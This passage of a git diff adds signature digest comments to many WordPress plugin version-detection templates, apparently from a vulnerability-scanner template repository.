4a0a00473045022100fe3a81b983858e6aa75f53d82b8262b6a1ca56347315d442eb72327e93fc5c0002203e27bb56065acd1738b4b7b60f5947128c55183dfed9cd3ba75c0dc4f4264a34:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index adf3387ddb..8b6403f270 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202aa116910d72b6e918a833982ced9683b45b8d198019a69d1155873cabbcf6bf02203ada66e11d9884855d32d4c5048574c3df74de9cf1961024a801647886728c9e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index eb6e1aaa5d..a6eed55ad9 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022064436014aab6534f603d4f2982960dfd9458fc75d158562af8984d2984b0416902202b364c30b74645c4783c077abd0fea3439436ef8b5320b1d313ffd30fd3f1915:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/popup-builder.yaml b/http/technologies/wordpress/plugins/popup-builder.yaml index b3c83cd0bf..2d62b26097 100644 --- a/http/technologies/wordpress/plugins/popup-builder.yaml +++ b/http/technologies/wordpress/plugins/popup-builder.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220441e97d329af65d77e6c4d26098d0bb5bf1d6e8be59c1a5265e3bdd2c130be8d022100a0cea0a469a4265d6f183df1e2dfd56d3266fa19916ba87df6d4fa658d0134e3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 96d8bd6aca..9dcb899b9c 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502202e5caa2c52549e67f3b724b7dd8c30060262eaee02d6a640dbb19e84fa365cf5022100924bf7bdddb9b01ad3a2d8c18d1bc003b7b8cc78a9977c066c686ef31a16b82a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index 85955ac95e..5dffb19950 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502201c316891170440b15dc8551f5b9c8551bdb8bf77335de08e997da139d83eea36022100fdcd10f49845983d12ed473a8e410461b475afb5c1a16c978ff7ee67415374b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index 56d2e4efcd..23d0a65b35 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f907641cd0461feb52c159826fa1dfbf873adbfd7210a5296e0b46b8cbe9192302210086c7050d4bad546a2d35098dab99bc2a99585fa3158f57b45ddfbbfff6a4f7a4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index d9c6052cd7..b41842fd29 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022021907641e29c4b58dba730009af7a0415cf05895b5e3ea9b92eff6dd53f583aa022100818fed95ba1d30c30fc975e827ceac1bbf24f094f63f2e2fa4386bb8ee5e67d8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index afc1141e0c..cebb1fa1ad 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207737df68b8389ab2440d213b7f660e121b5c2616b33ff99ed23cb30fea75814a02200526231d44aed8820afb7a7e90a80a51164883a50dbf13ff8b2e6304b84279b6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index d44add9ca6..7a084abc8d 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206e5a5c686c32f99f67dda5e48113f6669c49f1409a9c7cda64f6bc287d60b164022100e6c74fd22a394a86bd6888483fdcbfa4b11da6ca6605c58b8a9d0d65d6ebaede:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index 20ba5c2e16..e6fa0699a4 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207ed8a7e17350d4a2b0ea4576ff3ace2628820e4f6513bab5fdd5e18f0b5e80e4022047f6a7d2e3f8c26d4a7545a5466a5950ef1f934b5a510c8374efe7a7f1be58e9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index cbcf3cf09d..9c78cf7891 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221008c4d3188cbe214f34a545f54d3f57e072c84dba6e11c284335e1a65f99c69f2e022100fd9cf7dde044727201adbd976a09ca4e020b6d27ba8c6cf35b55c41e71c41d34:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index 3311d42c94..e00ba637ad 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502202a4a3acb94e8c21f694cf652050fe7a5f183e0a4c18e33ff83a40c959f4452c8022100ef7a9ca8e6b8effc57f7391491aca5f031f02a199f38a4be8d8d9cfbb4b6c7f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 46c1c22805..eba05b229c 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221008b2446e445301786e8cda5e1b7b4fac86dacb0e5d0b8669602940397be330ee102210089883aa16490d28b00ae5d8c6c65ece84f8fb63f0194cc2016a3e134f1441e10:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 7c13b8d2a4..222091977c 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220095084ead6d97ac003168787cccb95b651778889c027ce72564266a511ffe77f022070e6e4702302ee3c2cda447ade8745923adbde12e5cbb1fdd15f7721d9d1a173:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index 53b30ba721..c3b65774ab 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221008b33d2a06bd672c3d9695d1452d856a695e356a6e9835a145f3e40582a13f50d02207817ed22c8da6c4287d75c58eaeefdb9002aba940e38a46984d9ddee4e5260a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index dc3d446af3..269134eb59 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f81dcbbff92f29994faf8d91a54fde1061414a8ffe7f48c32c7629307a6f074902205e0520e47225d9ba436e1192517adad1942ee81a9e7c4c18d604c954212c8b52:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index 96b4699d2d..fd2d82bb2d 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022024b77a544921bff84dcb7d0015dc75b6292abdc16e8a9a15858928496b870b74022100849d5b51c48be8106e09ef5c91c21a2752080b37c822226c5c6eec95293d3497:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index 17584cd064..4ea2f1a5e5 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202746786a013c54d196cdb9ed47e5d594febdc29514ba9d7cdbd837c1206d506b022053be488b317e0237d9947626975445f2197fd9a0403cebb6a15941474c9187d7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 015fb97043..237670e78c 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200562999ebbd37bf2d3619f7bc59a697d27c494f3207e836cafbbeb3b13702715022100f5517e7e7cf8ec77a5080d492b32b69a69ccc36f6b0aa8b8abd397de963a8e38:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index 1d5224b457..8fa5639785 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022011630669de08df30cf328b39eb2b4bd36ba31244d195d116cebc5d04c74e15f60221008a10d1c901ba5bcd7404302648412bb75ce622954643cbdfc6cc482ea7299544:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index aafd6c6a38..b87cf1e0f6 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100aeddcac97ba4b65efff620b6045e8642f33203d7c0a95bbf85f68e241c35aaca022100b9aa03a9d7a4b0c05f6fda40ac033c6f2054ac781fb280d1826c7f38ec0f5e0a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index e10ab985da..10d1787b14 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b0c29fbde561425303b60e0d97745d0c24b300f60f58b8177f344fe86bd5e46c022022de9125af09e219bc4bbd706c69984cb2d2ded8bc87ea449ecc2863f4c7ab03:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index 9881b591ae..e08f88f9db 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ccc4570a3867dc9a15fc3cd439188a8cd5e925623aac1e657dd9f096c646f0a502207374e4433517d4caa54b01e69bad111f1500810a010fb8c23380852bda5c3b25:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 69c367b8d5..c919aed15b 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202c0d44a95130b47da84c19049a76f1c894504c5aa13b5ae6c4d8b2b4c3cb653d0220260822736e215a51be0733312b31978275a7178e4468007ad5a83178d0906a9e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index 26d525386b..18e13b2ebf 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022005dc8d2b939c3e50c22177d4b58e8e292a6b075dd2c288f00ead7e3e835587380220173b71e8c394823699fa3249bb248b8580e285dc176d02bbf0b662ec96f30fba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index 3920c5cf56..094c1a77fa 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205923239d1b282ec36109c5607332d8577b680604b6eea5907b6b7e4e1f4a406b022100ba936802f9c9d4d1ebd04a5686e89be54913f4f30333267fb66389c060d5825c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml index f556786f5a..2f59c83cc6 100644 --- a/http/technologies/wordpress/plugins/svg-support.yaml +++ b/http/technologies/wordpress/plugins/svg-support.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b3e7fc3a85f8c6641447a3cb8025d18d4ab9107f45e92aed1ef00e9dacc35e2c022100c3666f74b742c21f71ef4b63327f68d574374d48ef214d5939fddad3d45182b6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index 844e3d19a0..0d699b3576 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100fa8f6251aebc907f4cbefad3634a81205017112a13c2e6f4227112ff3764cbe702205dd33391abc7c3e959d37fdfe5896c11ee6faac75cd1823926a2305e7cf4c3e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index eb0f02f602..7837443fbb 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200eea834b1cfe14a4d8848eb27eb3bdca09b98f6d2cdf2212310d928a37b68aed022100ba59081f00ca79eec92ef126dcda731436a439774f31f6283270e7913867545c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 755efd53fa..7d57ae4745 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022073adcf633fe453e9e865e833d95b39cf6c3db15e72534dfb92814844cf5353c0022037ba9af8cbb90d63b0466af2369fedaa9a87a5eda6bc269ed68e6675074f8fec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index 0403bb4e72..a9e2944c12 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a2b51ce254c76e027dc3cf8752d268e6f01081fdfbdd0b28f684f00deb25c678022073f07ed0e3eee2bf11b1107ebe2bdfff4c81d7bb825117c07fef7fa348e22e2c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index b5f8b822c7..1d78b00887 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022000c09151531632ce74eac0db54a7f17cd8c2cca3aeccb6b6aafb42aea36a7b1b02204af3991583a6612806566944dc6e9306d14876f59fb2f597f9b193e6d3b4f25e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index 85aaf7ff16..92bf239e8d 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100af29737bf52cc420e96a54e7889ae04184e8b06a0ce4784e1322a1d47bedf9fa022100b20bf65b4d3847466ea2a95de239158105ce75ba102c716b6d849f99403a9f56:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 0af322b728..6a160a9a70 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220177a2d7ee7de1d4c7d73aaa39a28e71ea3b0ff9e86fe9aaaf9cd4df13c2259c9022022f5bf9a0532e0976c88c1f82a7c758d84dca8a5c7fc3364b38a5ae71ddc3560:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index d4ac0d179e..4ee86eb68d 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b9ad24529fb88e61c3c7786ea8e433acc711a7583a63773a8b164b65ae44fad8022100b3615ed36a90c653bf1dec0396d91b8aeeef35c9093ea884a06c66630640106f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index dbbadf3cfc..f2c314bf46 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100abaf6be76d15b4e93d0476e197f60eb7fb484b53bd4a8dc0bd8242e71b10c2d002210085f87523cf63397e69707d470e2d16512ff18f42974a652fb44dae68c0cf1cf5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/use-any-font.yaml b/http/technologies/wordpress/plugins/use-any-font.yaml index 401b0e479f..1eadccd874 100644 --- a/http/technologies/wordpress/plugins/use-any-font.yaml +++ b/http/technologies/wordpress/plugins/use-any-font.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022075539f26b293aa5f673916f1c47510d4b9915eb6fa13a4780bd2af3185b557d2022009e48497d4a39bc5876b852685ab08661d0bc6d85c16c2ceff5c62239f9da1f1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index 6f95506748..1c7c8d672d 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402200deee2bd5a21b875c938d8b1d234f728de21c335ff7ea43e5d052084ffb83083022053f43f9712527be692f64c2d5dbf49061707b8af543686a754ea879fe5f1cbf5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml index 4404f87aab..b6dab891ce 100644 --- a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml +++ b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502204796397351bcbd8981e563eae4aadd56d7730e6f2990c4a39741614ddd07382a022100d67ae285e03977652f1d355c488e98073e50b2c9844a53cb70eb79dc94a35a60:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 8995434fce..e4bb1f57a4 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402204fb67f0f83a14b80563784fb7704bac46274427329ed08a4d1f2dcaac2438f9c02204203220776ee282f95c4ff280d5692d3b2c6f7631d65ce24fc434f6387fe68fd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 8175806cb8..04b7890f4a 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b6d9fc01d9272370739bc006bd9c03dd1ff26124c36fe170400b5f8baa5f9d2502202eda7ddc1db689d867d2c8bc2a7d49da703be769fa01fcd66384b97581f2557a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index db82bc7f43..de4d538304 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022042080cbb6fc265136f8c870a3bdb9d645fa61fc21e7d83608bbaeb2d9a9cc5de02205096432ddda031b9d0ac2000784b81aa079c18967d1ebac737e546b284766419:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index 03ddae57bc..d084c73ef4 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c04f2880c34eaef6f4053a1a35c859fe14acbc49dbc7b439b629803f8e9d227f02203574f2054b4dd9dbab6261d87788fc268207eb79937b9257314566ffa0a9be0a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index d6449bb5bf..b05e7d8270 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022054b28181ed5e4592bf72c0cb5bfc5a482ea13ec941b354573c377b06ebb92da8022100b0bfed3ceec0de538c3b11066ad3266b2e6921eff7755d14f29bfd8a0c0fc5d0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index 2d5fdf1779..e08b9b79e2 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c2780bddbb1e8349240c269f1b81f1aaf12aa6d484c67a645960a4c9a8f0490e022100dde3cb4ef9d76beb19f5819485ffd0aad6ef1ec718d9a5c7a54c90f90f9195c3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 6b5705e20d..5b98016ee3 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022048332072632b496cde31e5696245caa6b599394455f8dcd12351488a8d19fc38022100b7fe5d9c125168844accffee4287f070b31ebf9d1e46cb02f57f7dbd35d180aa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml index dbcdb64bad..9e1362dd7e 100644 --- 